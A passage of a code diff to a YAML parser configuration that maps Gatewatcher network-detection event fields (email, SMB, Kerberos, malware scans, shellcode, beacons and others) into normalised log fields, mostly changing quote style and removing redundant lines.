+          gatewatcher.smtp.rcpt_to: "{{json_load.message.smtp.rcpt_to}}"
+          gatewatcher.smtp.mail_from: "{{json_load.message.smtp.mail_from}}"
   email:
     actions:
       - set:
-          email.subject: '{{json_load.message.email.subject}}'
-          email.message_id: '{{json_load.message.email.message_id}}'
-          email.attachments: '{{json_load.message.email.attachments}}'
-          email.to.address: '{{json_load.message.email.to}}'
-          email.from.address: '{{json_load.message.email.from}}'
-          gatewatcher.email.status: '{{json_load.message.email.status}}'
-          gatewatcher.email.body_md5: '{{json_load.message.email.body_md5}}'
-          gatewatcher.email.subject_md5: '{{json_load.message.email.subject_md5}}'
-        filter: ''
-        name: set
+          email.subject: "{{json_load.message.email.subject}}"
+          email.message_id: "{{json_load.message.email.message_id}}"
+          email.attachments: "{{json_load.message.email.attachments}}"
+          email.to.address: "{{json_load.message.email.to}}"
+          email.from.address: "{{json_load.message.email.from}}"
+          gatewatcher.email.status: "{{json_load.message.email.status}}"
+          gatewatcher.email.body_md5: "{{json_load.message.email.body_md5}}"
+          gatewatcher.email.subject_md5: "{{json_load.message.email.subject_md5}}"
   smb:
     actions:
       - set:
-          gatewatcher.smb.id: '{{json_load.message.smb.id}}'
-          gatewatcher.smb.status: '{{json_load.message.smb.status}}'
-          gatewatcher.smb.command: '{{json_load.message.smb.command}}'
-          gatewatcher.smb.dialect: '{{json_load.message.smb.dialect}}'
-          gatewatcher.smb.tree_id: '{{json_load.message.smb.tree_id}}'
-          gatewatcher.smb.session_id: '{{json_load.message.smb.session_id}}'
-          gatewatcher.smb.status_code: '{{json_load.message.smb.status_code}}'
-        filter: ''
-        name: set
+          gatewatcher.smb.id: "{{json_load.message.smb.id}}"
+          gatewatcher.smb.status: "{{json_load.message.smb.status}}"
+          gatewatcher.smb.command: "{{json_load.message.smb.command}}"
+          gatewatcher.smb.dialect: "{{json_load.message.smb.dialect}}"
+          gatewatcher.smb.tree_id: "{{json_load.message.smb.tree_id}}"
+          gatewatcher.smb.session_id: "{{json_load.message.smb.session_id}}"
+          gatewatcher.smb.status_code: "{{json_load.message.smb.status_code}}"
   nfs:
     actions:
       - set:
-          gatewatcher.nfs.id: '{{json_load.message.nfs.id}}'
-          gatewatcher.nfs.type: '{{json_load.message.nfs.type}}'
-          gatewatcher.nfs.hhash: '{{json_load.message.nfs.hhash}}'
-          gatewatcher.nfs.status: '{{json_load.message.nfs.status}}'
-          gatewatcher.nfs.file_tx: '{{json_load.message.nfs.file_tx}}'
-          gatewatcher.nfs.version: '{{json_load.message.nfs.version}}'
-          gatewatcher.nfs.filename: '{{json_load.message.nfs.filename}}'
-          gatewatcher.nfs.procedure: '{{json_load.message.nfs.procedure}}'
-        filter: ''
-        name: set
+          gatewatcher.nfs.id: "{{json_load.message.nfs.id}}"
+          gatewatcher.nfs.type: "{{json_load.message.nfs.type}}"
+          gatewatcher.nfs.hhash: "{{json_load.message.nfs.hhash}}"
+          gatewatcher.nfs.status: "{{json_load.message.nfs.status}}"
+          gatewatcher.nfs.file_tx: "{{json_load.message.nfs.file_tx}}"
+          gatewatcher.nfs.version: "{{json_load.message.nfs.version}}"
+          gatewatcher.nfs.filename: "{{json_load.message.nfs.filename}}"
+          gatewatcher.nfs.procedure: "{{json_load.message.nfs.procedure}}"
   ftp:
     actions:
       - set:
-          gatewatcher.ftp.reply: '{{json_load.message.ftp.reply}}'
-          gatewatcher.ftp.reply_received: '{{json_load.message.ftp.reply_received}}'
-          gatewatcher.ftp.completion_code: '{{json_load.message.ftp.completion_code}}'
-          gatewatcher.ftp.reply_truncated: '{{json_load.message.ftp.reply_truncated}}'
-        filter: ''
-        name: set
+          gatewatcher.ftp.reply: "{{json_load.message.ftp.reply}}"
+          gatewatcher.ftp.reply_received: "{{json_load.message.ftp.reply_received}}"
+          gatewatcher.ftp.completion_code: "{{json_load.message.ftp.completion_code}}"
+          gatewatcher.ftp.reply_truncated: "{{json_load.message.ftp.reply_truncated}}"
   tftp:
     actions:
       - set:
-          gatewatcher.tftp.file: '{{json_load.message.tftp.file}}'
-          gatewatcher.tftp.mode: '{{json_load.message.tftp.mode}}'
-          gatewatcher.tftp.packet: '{{json_load.message.tftp.packet}}'
-        filter: ''
-        name: set
+          gatewatcher.tftp.file: "{{json_load.message.tftp.file}}"
+          gatewatcher.tftp.mode: "{{json_load.message.tftp.mode}}"
+          gatewatcher.tftp.packet: "{{json_load.message.tftp.packet}}"
   ssh:
     actions:
       - set:
-          gatewatcher.ssh.client.hassh: '{{json_load.message.ssh.client.hassh}}'
-          gatewatcher.ssh.server.hassh: '{{json_load.message.ssh.server.hassh}}'
-          gatewatcher.ssh.client.proto_version: '{{json_load.message.ssh.client.proto_version}}'
-          gatewatcher.ssh.server.proto_version: '{{json_load.message.ssh.server.proto_version}}'
-          gatewatcher.ssh.client.software_version: '{{json_load.message.ssh.client.software_version}}'
-          gatewatcher.ssh.server.software_version: '{{json_load.message.ssh.server.software_version}}'
-        filter: ''
-        name: set
+          gatewatcher.ssh.client.hassh: "{{json_load.message.ssh.client.hassh}}"
+          gatewatcher.ssh.server.hassh: "{{json_load.message.ssh.server.hassh}}"
+          gatewatcher.ssh.client.proto_version: "{{json_load.message.ssh.client.proto_version}}"
+          gatewatcher.ssh.server.proto_version: "{{json_load.message.ssh.server.proto_version}}"
+          gatewatcher.ssh.client.software_version: "{{json_load.message.ssh.client.software_version}}"
+          gatewatcher.ssh.server.software_version: "{{json_load.message.ssh.server.software_version}}"
   krb5:
     actions:
       - set:
-          gatewatcher.krb5.cname: '{{json_load.message.krb5.cname}}'
-          gatewatcher.krb5.realm: '{{json_load.message.krb5.realm}}'
-          gatewatcher.krb5.sname: '{{json_load.message.krb5.sname}}'
-          gatewatcher.krb5.msg_type: '{{json_load.message.krb5.msg_type}}'
-          gatewatcher.krb5.encryption: '{{json_load.message.krb5.encryption}}'
-          gatewatcher.krb5.error_code: '{{json_load.message.krb5.error_code}}'
-          gatewatcher.krb5.failed_request: '{{json_load.message.krb5.failed_request}}'
-          gatewatcher.krb5.weak_encryption: '{{json_load.message.krb5.weak_encryption}}'
-        filter: ''
-        name: set
+          gatewatcher.krb5.cname: "{{json_load.message.krb5.cname}}"
+          gatewatcher.krb5.realm: "{{json_load.message.krb5.realm}}"
+          gatewatcher.krb5.sname: "{{json_load.message.krb5.sname}}"
+          gatewatcher.krb5.msg_type: "{{json_load.message.krb5.msg_type}}"
+          gatewatcher.krb5.encryption: "{{json_load.message.krb5.encryption}}"
+          gatewatcher.krb5.error_code: "{{json_load.message.krb5.error_code}}"
+          gatewatcher.krb5.failed_request: "{{json_load.message.krb5.failed_request}}"
+          gatewatcher.krb5.weak_encryption: "{{json_load.message.krb5.weak_encryption}}"
   dhcp:
     actions:
       - set:
-          gatewatcher.dhcp.id: '{{json_load.message.dhcp.id}}'
-          gatewatcher.dhcp.type: '{{json_load.message.dhcp.type}}'
-          gatewatcher.dhcp.routers: '{{json_load.message.dhcp.routers}}'
-          gatewatcher.dhcp.hostname: '{{json_load.message.dhcp.hostname}}'
-          gatewatcher.dhcp.relay_ip: '{{json_load.message.dhcp.relay_ip}}'
-          gatewatcher.dhcp.client_ip: '{{json_load.message.dhcp.client_ip}}'
-          gatewatcher.dhcp.dhcp_type: '{{json_load.message.dhcp.dhcp_type}}'
-          gatewatcher.dhcp.client_mac: '{{json_load.message.dhcp.client_mac}}'
-          gatewatcher.dhcp.lease_time: '{{json_load.message.dhcp.lease_time}}'
-          gatewatcher.dhcp.assigned_ip: '{{json_load.message.dhcp.assigned_ip}}'
-          gatewatcher.dhcp.dns_servers: '{{json_load.message.dhcp.dns_servers}}'
-          gatewatcher.dhcp.subnet_mask: '{{json_load.message.dhcp.subnet_mask}}'
-          gatewatcher.dhcp.next_server_ip: '{{json_load.message.dhcp.next_server_ip}}'
-        filter: ''
-        name: set
+          gatewatcher.dhcp.id: "{{json_load.message.dhcp.id}}"
+          gatewatcher.dhcp.type: "{{json_load.message.dhcp.type}}"
+          gatewatcher.dhcp.routers: "{{json_load.message.dhcp.routers}}"
+          gatewatcher.dhcp.hostname: "{{json_load.message.dhcp.hostname}}"
+          gatewatcher.dhcp.relay_ip: "{{json_load.message.dhcp.relay_ip}}"
+          gatewatcher.dhcp.client_ip: "{{json_load.message.dhcp.client_ip}}"
+          gatewatcher.dhcp.dhcp_type: "{{json_load.message.dhcp.dhcp_type}}"
+          gatewatcher.dhcp.client_mac: "{{json_load.message.dhcp.client_mac}}"
+          gatewatcher.dhcp.lease_time: "{{json_load.message.dhcp.lease_time}}"
+          gatewatcher.dhcp.assigned_ip: "{{json_load.message.dhcp.assigned_ip}}"
+          gatewatcher.dhcp.dns_servers: "{{json_load.message.dhcp.dns_servers}}"
+          gatewatcher.dhcp.subnet_mask: "{{json_load.message.dhcp.subnet_mask}}"
+          gatewatcher.dhcp.next_server_ip: "{{json_load.message.dhcp.next_server_ip}}"
   ftp_data:
     actions:
       - set:
-          gatewatcher.ftp_data.command: '{{json_load.message.ftp_data.command}}'
-          gatewatcher.ftp_data.filename: '{{json_load.message.ftp_data.filename}}'
-        filter: ''
-        name: set
+          gatewatcher.ftp_data.command: "{{json_load.message.ftp_data.command}}"
+          gatewatcher.ftp_data.filename: "{{json_load.message.ftp_data.filename}}"
   snmp:
     actions:
       - set:
-          gatewatcher.snmp.vars: '{{json_load.message.snmp.vars}}'
-          gatewatcher.snmp.version: '{{json_load.message.snmp.version}}'
-          gatewatcher.snmp.pdu_type: '{{json_load.message.snmp.pdu_type}}'
-          gatewatcher.snmp.community: '{{json_load.message.snmp.community}}'
-        filter: ''
-        name: set
+          gatewatcher.snmp.vars: "{{json_load.message.snmp.vars}}"
+          gatewatcher.snmp.version: "{{json_load.message.snmp.version}}"
+          gatewatcher.snmp.pdu_type: "{{json_load.message.snmp.pdu_type}}"
+          gatewatcher.snmp.community: "{{json_load.message.snmp.community}}"
   rdp:
     actions:
       - set:
-          gatewatcher.rdp.tx_id: '{{json_load.message.rdp.tx_id}}'
-          gatewatcher.rdp.client: '{{json_load.message.rdp.client}}'
-          gatewatcher.rdp.cookie: '{{json_load.message.rdp.cookie}}'
-          gatewatcher.rdp.channels: '{{json_load.message.rdp.channels}}'
-          gatewatcher.rdp.protocol: '{{json_load.message.rdp.protocol}}'
-          gatewatcher.rdp.event_type: '{{json_load.message.rdp.event_type}}'
-          gatewatcher.rdp.server_supports: '{{json_load.message.rdp.server_supports}}'
-        filter: ''
-        name: set
+          gatewatcher.rdp.tx_id: "{{json_load.message.rdp.tx_id}}"
+          gatewatcher.rdp.client: "{{json_load.message.rdp.client}}"
+          gatewatcher.rdp.cookie: "{{json_load.message.rdp.cookie}}"
+          gatewatcher.rdp.channels: "{{json_load.message.rdp.channels}}"
+          gatewatcher.rdp.protocol: "{{json_load.message.rdp.protocol}}"
+          gatewatcher.rdp.event_type: "{{json_load.message.rdp.event_type}}"
+          gatewatcher.rdp.server_supports: "{{json_load.message.rdp.server_supports}}"
   rfb:
     actions:
       - set:
-          gatewatcher.rfb.authentication: '{{json_load.message.rfb.authentication}}'
-          gatewatcher.rfb.client_protocol_version: '{{json_load.message.rfb.client_protocol_version}}'
-          gatewatcher.rfb.server_protocol_version: '{{json_load.message.rfb.server_protocol_version}}'
-          gatewatcher.rfb.server_security_failure_reason: '{{json_load.message.rfb.server_security_failure_reason}}'
-        filter: ''
-        name: set
+          gatewatcher.rfb.authentication: "{{json_load.message.rfb.authentication}}"
+          gatewatcher.rfb.client_protocol_version: "{{json_load.message.rfb.client_protocol_version}}"
+          gatewatcher.rfb.server_protocol_version: "{{json_load.message.rfb.server_protocol_version}}"
+          gatewatcher.rfb.server_security_failure_reason: "{{json_load.message.rfb.server_security_failure_reason}}"
   ikev2:
     actions:
       - set:
-          gatewatcher.ikev2.role: '{{json_load.message.ikev2.role}}'
-          gatewatcher.ikev2.errors: '{{json_load.message.ikev2.errors}}'
-          gatewatcher.ikev2.notify: '{{json_load.message.ikev2.notify}}'
-          gatewatcher.ikev2.payload: '{{json_load.message.ikev2.payload}}'
-          gatewatcher.ikev2.init_spi: '{{json_load.message.ikev2.init_spi}}'
-          gatewatcher.ikev2.resp_spi: '{{json_load.message.ikev2.resp_spi}}'
-          gatewatcher.ikev2.message_id: '{{json_load.message.ikev2.message_id}}'
-          gatewatcher.ikev2.exchange_type: '{{json_load.message.ikev2.exchange_type}}'
-          gatewatcher.ikev2.version_major: '{{json_load.message.ikev2.version_major}}'
-          gatewatcher.ikev2.version_minor: '{{json_load.message.ikev2.version_minor}}'
-        filter: ''
-        name: set
+          gatewatcher.ikev2.role: "{{json_load.message.ikev2.role}}"
+          gatewatcher.ikev2.errors: "{{json_load.message.ikev2.errors}}"
+          gatewatcher.ikev2.notify: "{{json_load.message.ikev2.notify}}"
+          gatewatcher.ikev2.payload: "{{json_load.message.ikev2.payload}}"
+          gatewatcher.ikev2.init_spi: "{{json_load.message.ikev2.init_spi}}"
+          gatewatcher.ikev2.resp_spi: "{{json_load.message.ikev2.resp_spi}}"
+          gatewatcher.ikev2.message_id: "{{json_load.message.ikev2.message_id}}"
+          gatewatcher.ikev2.exchange_type: "{{json_load.message.ikev2.exchange_type}}"
+          gatewatcher.ikev2.version_major: "{{json_load.message.ikev2.version_major}}"
+          gatewatcher.ikev2.version_minor: "{{json_load.message.ikev2.version_minor}}"
   sip:
     actions:
       - set:
-          gatewatcher.sip.uri: '{{json_load.message.sip.uri}}'
-          gatewatcher.sip.method: '{{json_load.message.sip.method}}'
-          gatewatcher.sip.version: '{{json_load.message.sip.version}}'
-          gatewatcher.sip.request_line: '{{json_load.message.sip.request_line}}'
-        filter: ''
-        name: set
+          gatewatcher.sip.uri: "{{json_load.message.sip.uri}}"
+          gatewatcher.sip.method: "{{json_load.message.sip.method}}"
+          gatewatcher.sip.version: "{{json_load.message.sip.version}}"
+          gatewatcher.sip.request_line: "{{json_load.message.sip.request_line}}"
   dnp3:
     actions:
       - set:
-          gatewatcher.dnp3.dst: '{{json_load.message.dnp3.dst}}'
-          gatewatcher.dnp3.iin: '{{json_load.message.dnp3.iin}}'
-          gatewatcher.dnp3.src: '{{json_load.message.dnp3.src}}'
-          gatewatcher.dnp3.type: '{{json_load.message.dnp3.type}}'
-          gatewatcher.dnp3.control: '{{json_load.message.dnp3.control}}'
-          gatewatcher.dnp3.application: '{{json_load.message.dnp3.application}}'
-        filter: ''
-        name: set
+          gatewatcher.dnp3.dst: "{{json_load.message.dnp3.dst}}"
+          gatewatcher.dnp3.iin: "{{json_load.message.dnp3.iin}}"
+          gatewatcher.dnp3.src: "{{json_load.message.dnp3.src}}"
+          gatewatcher.dnp3.type: "{{json_load.message.dnp3.type}}"
+          gatewatcher.dnp3.control: "{{json_load.message.dnp3.control}}"
+          gatewatcher.dnp3.application: "{{json_load.message.dnp3.application}}"
   dcerpc:
     actions:
       - set:
-          gatewatcher.dcerpc.req: '{{json_load.message.dcerpc.req}}'
-          gatewatcher.dcerpc.res: '{{json_load.message.dcerpc.res}}'
-          gatewatcher.dcerpc.call_id: '{{json_load.message.dcerpc.call_id}}'
-          gatewatcher.dcerpc.request: '{{json_load.message.dcerpc.request}}'
-          gatewatcher.dcerpc.response: '{{json_load.message.dcerpc.response}}'
-          gatewatcher.dcerpc.interfaces: '{{json_load.message.dcerpc.interfaces}}'
-          gatewatcher.dcerpc.rpc_version: '{{json_load.message.dcerpc.rpc_version}}'
-        filter: ''
-        name: set
+          gatewatcher.dcerpc.req: "{{json_load.message.dcerpc.req}}"
+          gatewatcher.dcerpc.res: "{{json_load.message.dcerpc.res}}"
+          gatewatcher.dcerpc.call_id: "{{json_load.message.dcerpc.call_id}}"
+          gatewatcher.dcerpc.request: "{{json_load.message.dcerpc.request}}"
+          gatewatcher.dcerpc.response: "{{json_load.message.dcerpc.response}}"
+          gatewatcher.dcerpc.interfaces: "{{json_load.message.dcerpc.interfaces}}"
+          gatewatcher.dcerpc.rpc_version: "{{json_load.message.dcerpc.rpc_version}}"
   mqtt:
     actions:
       - set:
-          gatewatcher.mqtt.connack: '{{json_load.message.mqtt.connack}}'
-        filter: ''
-        name: set
+          gatewatcher.mqtt.connack: "{{json_load.message.mqtt.connack}}"
   malcore:
     actions:
       - set:
-          gatewatcher.malcore.code: '{{json_load.message.malcore.code}}'
-          gatewatcher.malcore.state: '{{json_load.message.malcore.state}}'
-          gatewatcher.malcore.engine_id: '{{json_load.message.malcore.engine_id}}'
-          gatewatcher.malcore.file_type: '{{json_load.message.malcore.file_type}}'
-          gatewatcher.malcore.total_found: '{{json_load.message.malcore.total_found}}'
-          gatewatcher.malcore.analyzers_up: '{{json_load.message.malcore.analyzers_up}}'
-          gatewatcher.malcore.magic_details: '{{json_load.message.malcore.magic_details}}'
-          gatewatcher.malcore.analyzed_clean: '{{json_load.message.malcore.analyzed_clean}}'
-          gatewatcher.malcore.analyzed_error: '{{json_load.message.malcore.analyzed_error}}'
-          gatewatcher.malcore.analyzed_other: '{{json_load.message.malcore.analyzed_other}}'
-          gatewatcher.malcore.processing_time: '{{json_load.message.malcore.processing_time}}'
-          gatewatcher.malcore.reporting_token: '{{json_load.message.malcore.reporting_token}}'
-          gatewatcher.malcore.detail_scan_time: '{{json_load.message.malcore.detail_scan_time}}'
-          gatewatcher.malcore.detail_wait_time: '{{json_load.message.malcore.detail_wait_time}}'
-          gatewatcher.malcore.analyzed_infected: '{{json_load.message.malcore.analyzed_infected}}'
-          gatewatcher.malcore.analyzed_suspicious: '{{json_load.message.malcore.analyzed_suspicious}}'
-          gatewatcher.malcore.detail_threat_found: '{{json_load.message.malcore.detail_threat_found}}'
-          gatewatcher.malcore.file_type_description: '{{json_load.message.malcore.file_type_description}}'
-          gatewatcher.malcore.engines_last_update_date: '{{json_load.message.malcore.engines_last_update_date}}'
-        filter: ''
-        name: set
+          gatewatcher.malcore.code: "{{json_load.message.malcore.code}}"
+          gatewatcher.malcore.state: "{{json_load.message.malcore.state}}"
+          gatewatcher.malcore.engine_id: "{{json_load.message.malcore.engine_id}}"
+          gatewatcher.malcore.file_type: "{{json_load.message.malcore.file_type}}"
+          gatewatcher.malcore.total_found: "{{json_load.message.malcore.total_found}}"
+          gatewatcher.malcore.analyzers_up: "{{json_load.message.malcore.analyzers_up}}"
+          gatewatcher.malcore.magic_details: "{{json_load.message.malcore.magic_details}}"
+          gatewatcher.malcore.analyzed_clean: "{{json_load.message.malcore.analyzed_clean}}"
+          gatewatcher.malcore.analyzed_error: "{{json_load.message.malcore.analyzed_error}}"
+          gatewatcher.malcore.analyzed_other: "{{json_load.message.malcore.analyzed_other}}"
+          gatewatcher.malcore.processing_time: "{{json_load.message.malcore.processing_time}}"
+          gatewatcher.malcore.reporting_token: "{{json_load.message.malcore.reporting_token}}"
+          gatewatcher.malcore.detail_scan_time: "{{json_load.message.malcore.detail_scan_time}}"
+          gatewatcher.malcore.detail_wait_time: "{{json_load.message.malcore.detail_wait_time}}"
+          gatewatcher.malcore.analyzed_infected: "{{json_load.message.malcore.analyzed_infected}}"
+          gatewatcher.malcore.analyzed_suspicious: "{{json_load.message.malcore.analyzed_suspicious}}"
+          gatewatcher.malcore.detail_threat_found: "{{json_load.message.malcore.detail_threat_found}}"
+          gatewatcher.malcore.file_type_description: "{{json_load.message.malcore.file_type_description}}"
+          gatewatcher.malcore.engines_last_update_date: "{{json_load.message.malcore.engines_last_update_date}}"
   sigflow:
     actions:
       - set:
-          gatewatcher.sigflow.gid: '{{json_load.message.sigflow.gid}}'
-          gatewatcher.sigflow.rev: '{{json_load.message.sigflow.rev}}'
-          gatewatcher.sigflow.action: '{{json_load.message.sigflow.action}}'
-          gatewatcher.sigflow.packet: '{{json_load.message.sigflow.packet}}'
-          gatewatcher.sigflow.stream: '{{json_load.message.sigflow.stream}}'
-          gatewatcher.sigflow.payload: '{{json_load.message.sigflow.payload}}'
-          gatewatcher.sigflow.category: '{{json_load.message.sigflow.category}}'
-          gatewatcher.sigflow.metadata: '{{json_load.message.sigflow.metadata}}'
-          gatewatcher.sigflow.signature: '{{json_load.message.sigflow.signature}}'
-          gatewatcher.sigflow.packet_info: '{{json_load.message.sigflow.packet_info}}'
-          gatewatcher.sigflow.signature_id: '{{json_load.message.sigflow.signature_id}}'
-          gatewatcher.sigflow.payload_printable: '{{json_load.message.sigflow.payload_printable}}'
-        filter: ''
-        name: set
+          gatewatcher.sigflow.gid: "{{json_load.message.sigflow.gid}}"
+          gatewatcher.sigflow.rev: "{{json_load.message.sigflow.rev}}"
+          gatewatcher.sigflow.action: "{{json_load.message.sigflow.action}}"
+          gatewatcher.sigflow.packet: "{{json_load.message.sigflow.packet}}"
+          gatewatcher.sigflow.stream: "{{json_load.message.sigflow.stream}}"
+          gatewatcher.sigflow.payload: "{{json_load.message.sigflow.payload}}"
+          gatewatcher.sigflow.category: "{{json_load.message.sigflow.category}}"
+          gatewatcher.sigflow.metadata: "{{json_load.message.sigflow.metadata}}"
+          gatewatcher.sigflow.signature: "{{json_load.message.sigflow.signature}}"
+          gatewatcher.sigflow.packet_info: "{{json_load.message.sigflow.packet_info}}"
+          gatewatcher.sigflow.signature_id: "{{json_load.message.sigflow.signature_id}}"
+          gatewatcher.sigflow.payload_printable: "{{json_load.message.sigflow.payload_printable}}"
   flow:
     actions:
       - set:
-          gatewatcher.flow.start: '{{json_load.message.flow.start}}'
-          gatewatcher.flow.pkts_toclient: '{{json_load.message.flow.pkts_toclient}}'
-          gatewatcher.flow.pkts_toserver: '{{json_load.message.flow.pkts_toserver}}'
-          gatewatcher.flow.bytes_toclient: '{{json_load.message.flow.bytes_toclient}}'
-          gatewatcher.flow.bytes_toserver: '{{json_load.message.flow.bytes_toserver}}'
-        filter: ''
-        name: set
+          gatewatcher.flow.start: "{{json_load.message.flow.start}}"
+          gatewatcher.flow.pkts_toclient: "{{json_load.message.flow.pkts_toclient}}"
+          gatewatcher.flow.pkts_toserver: "{{json_load.message.flow.pkts_toserver}}"
+          gatewatcher.flow.bytes_toclient: "{{json_load.message.flow.bytes_toclient}}"
+          gatewatcher.flow.bytes_toserver: "{{json_load.message.flow.bytes_toserver}}"
   shellcode:
     actions:
       - set:
-          gatewatcher.shellcode.id: '{{json_load.message.shellcode.id}}'
-          gatewatcher.shellcode.analysis: '{{json_load.message.shellcode.analysis}}'
-          gatewatcher.shellcode.sub_type: '{{json_load.message.shellcode.sub_type}}'
-          gatewatcher.shellcode.encodings: '{{json_load.message.shellcode.encodings}}'
-          gatewatcher.shellcode.sample_id: '{{json_load.message.shellcode.sample_id}}'
-        filter: ''
-        name: set
+          gatewatcher.shellcode.id: "{{json_load.message.shellcode.id}}"
+          gatewatcher.shellcode.analysis_text: "{{json_load.message.shellcode.analysis}}"
+          gatewatcher.shellcode.sub_type: "{{json_load.message.shellcode.sub_type}}"
+          gatewatcher.shellcode.encodings: "{{json_load.message.shellcode.encodings}}"
+          gatewatcher.shellcode.sample_id: "{{json_load.message.shellcode.sample_id}}"
   malicious_powershell:
     actions:
       - set:
-          gatewatcher.malicious_powershell.id: '{{json_load.message.malicious_powershell.id}}'
-          gatewatcher.malicious_powershell.score: '{{json_load.message.malicious_powershell.score}}'
-          gatewatcher.malicious_powershell.sample_id: '{{json_load.message.malicious_powershell.sample_id}}'
-          gatewatcher.malicious_powershell.score_details: '{{json_load.message.malicious_powershell.score_details}}'
-          gatewatcher.malicious_powershell.proba_obfuscated: '{{json_load.message.malicious_powershell.proba_obfuscated}}'
-        filter: ''
-        name: set
+          gatewatcher.malicious_powershell.id: "{{json_load.message.malicious_powershell.id}}"
+          gatewatcher.malicious_powershell.score: "{{json_load.message.malicious_powershell.score}}"
+          gatewatcher.malicious_powershell.sample_id: "{{json_load.message.malicious_powershell.sample_id}}"
+          gatewatcher.malicious_powershell.score_details_text: "{{json_load.message.malicious_powershell.score_details}}"
+          gatewatcher.malicious_powershell.proba_obfuscated: "{{json_load.message.malicious_powershell.proba_obfuscated}}"
   files:
     actions:
       - set:
-          gatewatcher.files: '{{json_load.message.files}}'
-        filter: ''
-        name: set
+          gatewatcher.files: "{{json_load.message.files}}"
   history:
     actions:
       - set:
-          gatewatcher.history.id: '{{json_load.message.history.id}}'
-          gatewatcher.history.ip: '{{json_load.message.history.ip}}'
-          gatewatcher.history.code: '{{json_load.message.history.code}}'
-          gatewatcher.history.name: '{{json_load.message.history.name}}'
-          gatewatcher.history.type: '{{json_load.message.history.type}}'
-          gatewatcher.history.method: '{{json_load.message.history.method}}'
-          gatewatcher.history.content: '{{json_load.message.history.content}}'
-          gatewatcher.history.endpoint: '{{json_load.message.history.endpoint}}'
-        filter: ''
-        name: set
+          gatewatcher.history.id: "{{json_load.message.history.id}}"
+          gatewatcher.history.ip: "{{json_load.message.history.ip}}"
+          gatewatcher.history.code: "{{json_load.message.history.code}}"
+          gatewatcher.history.name: "{{json_load.message.history.name}}"
+          gatewatcher.history.type: "{{json_load.message.history.type}}"
+          gatewatcher.history.method: "{{json_load.message.history.method}}"
+          gatewatcher.history.content: "{{json_load.message.history.content}}"
+          gatewatcher.history.endpoint: "{{json_load.message.history.endpoint}}"
   syslog:
     actions:
       - set:
-          network.application: '{{json_load.message.log.syslog.appname}}'
-          gatewatcher.syslog.priority: '{{json_load.message.log.syslog.priority}}'
-          gatewatcher.syslog.facility.code: '{{json_load.message.log.syslog.facility.code}}'
-          gatewatcher.syslog.facility.name: '{{json_load.message.log.syslog.facility.name}}'
-          event.severity: '{{json_load.message.log.syslog.severity.code}}'
-          gatewatcher.syslog.severity.name: '{{json_load.message.log.syslog.severity.name}}'
-          gatewatcher.syslog.message: '{{json_load.message.syslog.message}}'
-        filter: ''
-        name: set
+          network.application: "{{json_load.message.log.syslog.appname}}"
+          gatewatcher.syslog.priority: "{{json_load.message.log.syslog.priority}}"
+          gatewatcher.syslog.facility.code: "{{json_load.message.log.syslog.facility.code}}"
+          gatewatcher.syslog.facility.name: "{{json_load.message.log.syslog.facility.name}}"
+          event.severity: "{{json_load.message.log.syslog.severity.code}}"
+          gatewatcher.syslog.severity.name: "{{json_load.message.log.syslog.severity.name}}"
+          gatewatcher.syslog.message: "{{json_load.message.syslog.message}}"
   notification:
     actions:
       - set:
-          gatewatcher.notification.risk: '{{json_load.message.notification.risk}}'
-          gatewatcher.notification.title: '{{json_load.message.notification.title}}'
-          gatewatcher.notification.details: '{{json_load.message.notification.details}}'
-          gatewatcher.notification.component: '{{json_load.message.notification.component}}'
-          gatewatcher.notification.resolution: '{{json_load.message.notification.resolution}}'
-          gatewatcher.notification.description: '{{json_load.message.notification.description}}'
-          gatewatcher.notification.external_redirection: '{{json_load.message.notification.external_redirection}}'
-          gatewatcher.notification.internal_redirection: '{{json_load.message.notification.internal_redirection}}'
-        filter: ''
-        name: set
+          gatewatcher.notification.risk: "{{json_load.message.notification.risk}}"
+          gatewatcher.notification.title: "{{json_load.message.notification.title}}"
+          gatewatcher.notification.details: "{{json_load.message.notification.details}}"
+          gatewatcher.notification.component: "{{json_load.message.notification.component}}"
+          gatewatcher.notification.resolution: "{{json_load.message.notification.resolution}}"
+          gatewatcher.notification.description: "{{json_load.message.notification.description}}"
+          gatewatcher.notification.external_redirection: "{{json_load.message.notification.external_redirection}}"
+          gatewatcher.notification.internal_redirection: "{{json_load.message.notification.internal_redirection}}"
   beacon:
     actions:
       - set:
-          gatewatcher.beacon.id: '{{json_load.message.beacon.external_redirection}}'
-          gatewatcher.beacon.type: '{{json_load.message.beacon.type}}'
-          gatewatcher.beacon.active: '{{json_load.message.beacon.active}}'
-          gatewatcher.beacon.possible_cnc: '{{json_load.message.beacon.possible_cnc}}'
-          gatewatcher.beacon.session_count: '{{json_load.message.beacon.session_count}}'
-          gatewatcher.beacon.mean_time_interval: '{{json_load.message.beacon.mean_time_interval}}'
-          gatewatcher.beacon.hostname_resolution: '{{json_load.message.beacon.hostname_resolution}}'
-        filter: ''
-        name: set
+          gatewatcher.beacon.id: "{{json_load.message.beacon.external_redirection}}"
+          gatewatcher.beacon.type: "{{json_load.message.beacon.type}}"
+          gatewatcher.beacon.active: "{{json_load.message.beacon.active}}"
+          gatewatcher.beacon.possible_cnc: "{{json_load.message.beacon.possible_cnc}}"
+          gatewatcher.beacon.session_count: "{{json_load.message.beacon.session_count}}"
+          gatewatcher.beacon.mean_time_interval: "{{json_load.message.beacon.mean_time_interval}}"
+          gatewatcher.beacon.hostname_resolution: "{{json_load.message.beacon.hostname_resolution}}"
   retrohunt:
     actions:
       - set:
-          gatewatcher.matched_event.id: '{{json_load.message.matched_event.id}}'
-          gatewatcher.matched_event.file.sid: '{{json_load.message.matched_event.file.sid}}'
-          gatewatcher.matched_event.file.gaps: '{{json_load.message.matched_event.file.gaps}}'
-          gatewatcher.matched_event.file.name: '{{json_load.message.matched_event.file.name}}'
-          gatewatcher.matched_event.file.size: '{{json_load.message.matched_event.file.size}}'
-          gatewatcher.matched_event.file.magic: '{{json_load.message.matched_event.file.magic}}'
-          gatewatcher.matched_event.file.state: '{{json_load.message.matched_event.file.state}}'
-          gatewatcher.matched_event.file.tx_id: '{{json_load.message.matched_event.file.tx_id}}'
-          gatewatcher.matched_event.file.stored: '{{json_load.message.matched_event.file.stored}}'
-          gatewatcher.matched_event.file.hash.md5: '{{json_load.message.matched_event.file.hash.md5}}'
-          gatewatcher.matched_event.file.hash.sha256: '{{json_load.message.matched_event.file.hash.sha256}}'
-        filter: ''
-        name: set
+          gatewatcher.matched_event.id: "{{json_load.message.matched_event.id}}"
+          gatewatcher.matched_event.file.sid: "{{json_load.message.matched_event.file.sid}}"
+          gatewatcher.matched_event.file.gaps: "{{json_load.message.matched_event.file.gaps}}"
+          gatewatcher.matched_event.file.name: "{{json_load.message.matched_event.file.name}}"
